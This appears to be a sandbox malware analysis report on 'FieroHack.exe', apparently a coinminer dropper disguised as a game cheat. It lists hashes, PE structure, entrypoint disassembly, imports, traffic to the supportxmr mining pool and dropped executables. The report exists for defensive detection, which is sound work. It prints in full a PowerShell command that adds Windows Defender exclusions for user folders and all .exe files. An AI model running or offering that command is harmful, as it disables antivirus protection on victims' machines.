                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6A2D1FD5BA3F75656E23FEEF98269C17
                                                  SHA1:FF53B16BA78B6EAC4C3EDD11E0BAD08DDDDF9AED
                                                  SHA-256:D31478DA75850F66BA9FFB48AAD05BA6EC4E93B2534EA8BA230376F5D553579C
                                                  SHA-512:08D3565A332FD56F125634697A03D11B83D16E2E54B23A14C6110373C4A559BADDDCDF304158834DF42F98E1714849C3E8990B725ED3D1A6A86CD687984C686D
                                                  Malicious:true
                                                  Joe Sandbox View:
                                                  • Filename: FieroHack.exe, Detection: malicious, Browse
                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...QGpf.........."......|+.H.S.......)........@..............................T........*..`...................................................)...............(........* 1....)...............................).(....................................................rsrc............................... ..`.data...|-..........................@..@.pdata.. .'.........................@....pdata........(.....................@..@.pexe.........(.....................@..@.rsrc.........).....................@....rsrc.....*...)...*.................`...................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                  Download File
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):55
                                                  Entropy (8bit):4.306461250274409
                                                  Encrypted:false
                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                  Malicious:false
                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1510207563435464
                                                  Encrypted:false
                                                  SSDEEP:3:NlllulY:NllU
                                                  MD5:34816C42747EC90B363893CCBAA692C6
                                                  SHA1:0118AF418C7FEC1DAF42BFF44FCE32F4061511E5
                                                  SHA-256:583275D04DD34E9032A29DBCEB6A641BE82CD9881A7D92BF51F5137AE3D87F85
                                                  SHA-512:7CE22AE0B922602DE3DD662B27559BF2960272DDB26957ADC1DD9E4B32FC067D6724B3ECE98D31A594439A0F64DAAAE0C0F1780C60EA7F39D4C0B49F300AD5E6
                                                  Malicious:false
                                                  Preview:@...e................................................@..........

                                                  C:\Windows\Temp\__PSScriptPolicyTest_22poq0px.hrf.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Windows\Temp\__PSScriptPolicyTest_uyaajnt1.vxo.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Windows\Temp\__PSScriptPolicyTest_vbh35laq.3ui.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Windows\Temp\__PSScriptPolicyTest_xau403wb.ddt.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Windows\Temp\qkrjwvgkutvb.sys

                                                  Download File
                                                  Process:C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe
                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):14544
                                                  Entropy (8bit):6.2660301556221185
                                                  Encrypted:false
                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                  Malicious:false
                                                  Joe Sandbox View:
                                                  • Filename: CrackLauncher.exe, Detection: malicious, Browse
                                                  • Filename: tmpjtj6c3r6.exe, Detection: malicious, Browse
                                                  • Filename: qHYHgANDmm.exe, Detection: malicious, Browse
                                                  • Filename: FieroHack.exe, Detection: malicious, Browse
                                                  • Filename: gVRqUej0ci.exe, Detection: malicious, Browse
                                                  • Filename: 08OyZEWGbf.exe, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Trojan.InjectNET.14.31451.20106.exe, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Win32.Evo-gen.18867.15916.exe, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Win32.Evo-gen.10989.17096.exe, Detection: malicious, Browse
                                                  • Filename: Galaxy Swapper v2.0.3.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                  Entropy (8bit):5.38824988826933
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:FieroHack.exe
                                                  File size:6'603'296 bytes
                                                  MD5:b88f61a7938ef8af011259c59efc3d3d
                                                  SHA1:ba6f4356993959799fbd88bb350558045c363a85
                                                  SHA256:640397d3d855cbb8e3400f7564294bae51d591f7adb0f7856b7acfeb47f4e3d2
                                                  SHA512:ba7a3564327f2ec4e0c34710205bdb297b8c4a29f020f973462897d52f4d99fefbb74c1f511195d2ac3bae0e44a8dc749cdf6d043ff5fba9939cdd73c59e7d40
                                                  SSDEEP:98304:0rLVoBkwXnc+AdMIm8r3ctMmKCOQhMCTgeZ1lcvd6:uhIkwt+x31/CICj1lg6
                                                  TLSH:F66623916334C011F942D2708E7E6F55C26AEC133A3AEDD946D0FE9E21F3AE69709943
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                  File Icon

                                                  Icon Hash:170f2b3dbb3b0717

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x403348
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:ced282d9b261d1462772017fe2f6972b

                                                  Entrypoint Preview

                                                  Instruction
                                                  sub esp, 00000184h
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  xor ebx, ebx
                                                  push 00008001h
                                                  mov dword ptr [esp+18h], ebx
                                                  mov dword ptr [esp+10h], 0040A198h
                                                  mov dword ptr [esp+20h], ebx
                                                  mov byte ptr [esp+14h], 00000020h
                                                  call dword ptr [004080B8h]
                                                  call dword ptr [004080BCh]
                                                  and eax, BFFFFFFFh
                                                  cmp ax, 00000006h
                                                  mov dword ptr [0042F42Ch], eax
                                                  je 00007F4760C81323h
                                                  push ebx
                                                  call 00007F4760C84486h
                                                  cmp eax, ebx
                                                  je 00007F4760C81319h
                                                  push 00000C00h
                                                  call eax
                                                  mov esi, 004082A0h
                                                  push esi
                                                  call 00007F4760C84402h
                                                  push esi
                                                  call dword ptr [004080CCh]
                                                  lea esi, dword ptr [esi+eax+01h]
                                                  cmp byte ptr [esi], bl
                                                  jne 00007F4760C812FDh
                                                  push 0000000Bh
                                                  call 00007F4760C8445Ah
                                                  push 00000009h
                                                  call 00007F4760C84453h
                                                  push 00000007h
                                                  mov dword ptr [0042F424h], eax
                                                  call 00007F4760C84447h
                                                  cmp eax, ebx
                                                  je 00007F4760C81321h
                                                  push 0000001Eh
                                                  call eax
                                                  test eax, eax
                                                  je 00007F4760C81319h
                                                  or byte ptr [0042F42Fh], 00000040h
                                                  push ebp
                                                  call dword ptr [00408038h]
                                                  push ebx
                                                  call dword ptr [00408288h]
                                                  mov dword ptr [0042F4F8h], eax
                                                  push ebx
                                                  lea eax, dword ptr [esp+38h]
                                                  push 00000160h
                                                  push eax
                                                  push ebx
                                                  push 00429850h
                                                  call dword ptr [0040816Ch]
                                                  push 0040A188h

                                                  Rich Headers

                                                  Programming Language:
                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x10fa0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x64570x6600f6e38befa56abea7a550141c731da779False0.6682368259803921data6.434985703212657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x80000x13800x1400569269e9338b2e8ce268ead1326e2b0bFalse0.4625data5.2610038973135005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xa0000x255380x60017edd496e40111b5a48947c480fda13cFalse0.4635416666666667data4.133728555004788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .ndata0x300000x80000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x380000x10fa00x110009536175401f52a89c69bba50d48e03ebFalse0.19109030330882354data4.2366097734374675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x381900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 37795 x 37795 px/mEnglishUnited States0.18151839583579793
                                                  RT_DIALOG0x489b80x100dataEnglishUnited States0.5234375
                                                  RT_DIALOG0x48ab80x11cdataEnglishUnited States0.6056338028169014
                                                  RT_DIALOG0x48bd80x60dataEnglishUnited States0.7291666666666666
                                                  RT_GROUP_ICON0x48c380x14dataEnglishUnited States1.15
                                                  RT_MANIFEST0x48c500x34bXML 1.0 document, ASCII text, with very long lines (843), with no line terminatorsEnglishUnited States0.5527876631079478

                                                  Imports

                                                  DLLImport
                                                  ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                  SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                  ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                  USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  06/30/24-01:34:52.402369UDP2047928ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com)5750953192.168.2.41.1.1.1

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jun 30, 2024 01:34:52.411555052 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:34:52.416923046 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:34:52.416994095 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:34:52.417277098 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:34:52.422914028 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:34:53.059102058 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:34:53.059114933 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:34:53.059186935 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:34:53.061481953 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:34:53.066205025 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:34:53.252423048 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:34:53.252681971 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:34:53.257421017 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:34:53.441235065 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:34:53.491447926 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:35:03.536570072 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:35:03.585225105 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:35:07.422293901 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:35:07.475871086 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:35:19.213376045 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:35:19.257133961 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:35:31.730679989 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:35:31.772927046 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:35:41.941694021 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:35:41.991583109 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:35:49.159985065 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:35:49.166012049 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:35:49.367660046 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:35:49.413453102 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:35:58.511065006 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:35:58.554085016 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:36:03.558718920 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:36:03.600967884 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:36:08.691050053 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:36:08.741605997 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:36:31.715552092 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:36:31.757283926 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:36:47.630804062 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:36:47.679234028 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:36:59.191154957 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:36:59.241710901 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:37:03.582983017 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:37:03.632503033 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:37:12.675256014 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:37:12.726222992 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:37:19.053792000 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:37:19.062326908 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:37:19.264878988 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:37:19.319988012 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:37:23.430121899 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:37:23.476336002 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:37:26.548785925 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:37:26.553626060 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:37:26.755466938 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:37:26.804265022 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:37:33.545761108 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:37:33.601238966 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:37:43.572747946 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:37:43.616813898 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:38:03.617125988 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:38:03.663722992 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:38:06.162776947 CEST497429000192.168.2.4141.94.96.144
                                                  Jun 30, 2024 01:38:06.168212891 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:38:06.371553898 CEST900049742141.94.96.144192.168.2.4
                                                  Jun 30, 2024 01:38:06.413737059 CEST497429000192.168.2.4141.94.96.144

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jun 30, 2024 01:34:52.402369022 CEST5750953192.168.2.41.1.1.1
                                                  Jun 30, 2024 01:34:52.409014940 CEST53575091.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jun 30, 2024 01:34:52.402369022 CEST192.168.2.41.1.1.10x1141Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jun 30, 2024 01:34:52.409014940 CEST1.1.1.1192.168.2.40x1141No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                  Jun 30, 2024 01:34:52.409014940 CEST1.1.1.1192.168.2.40x1141No error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                  Jun 30, 2024 01:34:52.409014940 CEST1.1.1.1192.168.2.40x1141No error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                  Jun 30, 2024 01:34:52.409014940 CEST1.1.1.1192.168.2.40x1141No error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:19:33:56
                                                  Start date:29/06/2024
                                                  Path:C:\Users\user\Desktop\FieroHack.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\FieroHack.exe"
                                                  Imagebase:0x400000
                                                  File size:6'603'296 bytes
                                                  MD5 hash:B88F61A7938EF8AF011259C59EFC3D3D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:19:34:16
                                                  Start date:29/06/2024
                                                  Path:C:\Users\user\AppData\Roaming\WeMod.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\WeMod.exe
                                                  Imagebase:0x7ff617660000
                                                  File size:718'354'208 bytes
                                                  MD5 hash:6A2D1FD5BA3F75656E23FEEF98269C17
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:19:34:16
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:19:34:16
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:19:34:26
                                                  Start date:29/06/2024
                                                  Path:C:\Users\user\AppData\Roaming\Sirus.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\Sirus.exe
                                                  Imagebase:0x2f0000
                                                  File size:802'664'960 bytes
                                                  MD5 hash:35161C329ACE0D7440101EEBBE9BF7A4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
